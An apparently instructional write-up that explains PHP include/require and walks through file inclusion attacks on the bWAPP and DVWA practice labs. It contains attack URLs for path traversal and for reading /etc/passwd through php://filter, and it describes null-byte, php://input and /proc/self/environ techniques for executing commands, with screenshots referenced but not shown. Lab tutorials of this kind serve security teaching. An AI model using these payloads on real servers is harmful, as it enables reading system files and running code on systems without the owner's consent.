Developer can insert the content of PHP file into another PHP file
before the server executes it, with the include() function.
The function can be used to create functions, headers, footers or
element that will be reused on multiple pages.
This will help developers to make it easy to change the layout of
complete website with minimal effort. If there is any change required
then instead of changing thousands of files just change included
file.
The require() statement is also used to included a file
into the PHP code. However, there is a big difference between include
and require, when a file is included with the include statement and
PHP cannot find it, the script will continue to execute.
But in require statement, script will not continue if the file is not
available. It will return fatal error.
Require_once()
function can access the data of
another page once when you may need to include the called file. The
only difference between require and require_once is, if the file
found that it has already been included, calling script is going to
ignore further inclusions.
Note: allow_url_include is disabled by default. If allow_url_fopen is
disabled, allow_url_include is also disabled.
File Inclusion
Attacks:
It allows an attacker to include a file on the wen server through a
php script. This vulnerability arises when a web application accepts
client to submit input into files or upload files to the server.
Two types of File
Inclusion Attack,
a) Local File
Inclusion
b) Remote File
Inclusion
Basic Local
File Inclusion:
LFI
Vulnerability allows the user
to include a file through URL in the browser.
In this article I have used two different platforms bWAPP and DVWA
which contains file inclusion vulnerability.
Below is the file which we are going to attack,
{Please look image 01}
Before
we select the “English” language, the url is
http://192.168.93.156/bwapp/bWAPP/rlfi.php
After
selecting the language, the url is
http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=lang_en.php&action=go
We can see the change, the selected language file got included in the
URL. I will change the path to different file to check it is
vulnerable.
When I change the file path to below,
http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=../../index.html
{Please look image 02}
{Please look image 03}
Null Byte:
By changing the level of security, the same file is not working.
{Please look image 04}
With the help of Burpsuite – Interceptor, we captured the requested
data and the same has been forwarded to Burpsuite – Repeator.
{Please look image 05}
By adding a “null character” at end of the file it worked as
expected.
Base64 Encoded:
There are another way to exploit LFI if the security level is high.
Below is the url to use the PHP function,
http://192.168.1.101/bWAPP/rlfi.php?language=
php://filter/read=convert.base64-encode/resource=/etc/passwd
{Please look image 06}
below is the base64 encoded value of //etc/passwd,
Decoded the above value with the help of Burpsuite – Decoder,
We can use the hackbar which is a Firefox plugin to decode the above
base64 value,
{Please look image 07}
PHP Input:
Using PHP input function we will execute injected PHP code to exploit
LFI vulnerability. Will perform this task with the help of “hackbar”.
{Please look image 08}
Manipulate the value inside the hackbar tool.
{Please look image 09}
{Please look image 10}
Proc/Self/Environ:
If the server is outdated from patching, it may be vulnerable to
exploit through LFI.
proc/self/environ is a file that stores user_agent details. We will
use this file to store our php code for executing CMD commands.
{Please look image 11}
Remote File Inclusion:
Remote file inclusion occurs when the URL of a file located on a
different server is passed to as a parameter to the PHP function
which is “include”, “include_once”, “require”,
“require_once”. PHP incorporates the content into the pages. If
the content happens to be PHP source code, PHP executes the file.
{Please look image 12}
{Please look image 13}
